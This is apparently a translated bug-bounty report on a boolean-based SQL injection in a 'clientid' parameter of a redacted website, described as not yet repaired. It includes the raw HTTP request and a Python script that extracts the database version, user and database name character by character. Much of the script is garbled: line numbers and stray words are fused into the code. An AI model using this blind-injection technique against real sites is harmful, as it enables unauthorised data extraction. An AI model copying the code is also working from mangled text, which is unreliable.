RANK 24
Gold 24
Equivalent RMB 240
With the previous vulnerability homologous so only 24
Data package:
get/check?clientid=64915 http/1.1
Host:aaa.bbb.com
user-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/62.0.3202.89 safari/537.36
Accept: */*
Cookie:xx
Connection:close
The ClientID parameter has a Boolean injection, Sqlmap does not have the data, so write a script to verify
Script
By convention, the code may leak the location of the relevant information is removed, or code. It's fresh, it hasn't been repaired yet.
1 #!/usr/bin/env Python32 #DATE:1/5 16:043 #Comment:no Comment4 5 6 ImportRequests7 8Raw_url =XXX9Burp0_cookies ={XXX}TenBurp0_headers ={XXX} One A - defget_version (): -Version ="' the forIinchRange (1, 20): - forJinchRange (32, 127): -Burp0_url ="http://aaa.bbb.com/check?clientId=54915 '/**/or/**/ascii (version (),"+ STR (i) +", 1)) ="+Str (j) - PrintBurp0_url + Try: -res = Requests.get (Burp0_url, Headers=burp0_headers, cookies=burp0_cookies) + exceptException as E: A Continue at if "true" inchRes.text: -Version + =Chr (j) - Break - Print('version:', Version) - - in defGet_user (): -user ="' to forIinchRange (1, 20): + forJinchRange (32, 127): -Burp0_url ="http://aaa.bbb.com/check?clientId=54915 '/**/or/**/ascii (User (),"+ STR (i) +", 1)) ="+Str (j) the PrintBurp0_url * Try: $res = Requests.get (Burp0_url, Headers=burp0_headers, cookies=burp0_cookies)Panax Notoginseng exceptException as E: - Continue the if "true" inchRes.text: +User + =Chr (j) A Break the Print('User:', user) + - $ defget_db (): $current_db ="' - forIinchRange (1, 20): - forJinchRange (32, 127): theBurp0_url ="http://aaa.bbb.com/check?clientId=54915 '/**/or/**/ascii (Mid (Database (),"+ STR (i) +", 1)) ="+Str (j) - PrintBurp0_urlWuyi Try: theres = Requests.get (Burp0_url, Headers=burp0_headers, cookies=burp0_cookies) - exceptException as E: Wu Continue - if "true" inchRes.text: Aboutcurrent_db + =Chr (j) $ Break - Print('current_db:', current_db) - - get_version () A get_db () +Get_user ()
Sqlmap run out, that is, the scanner first run out, but Sqlmap can not verify, but it does exist, it is possible to write script verification, this is a way of thinking it.
"High risk" xx a station SQL injection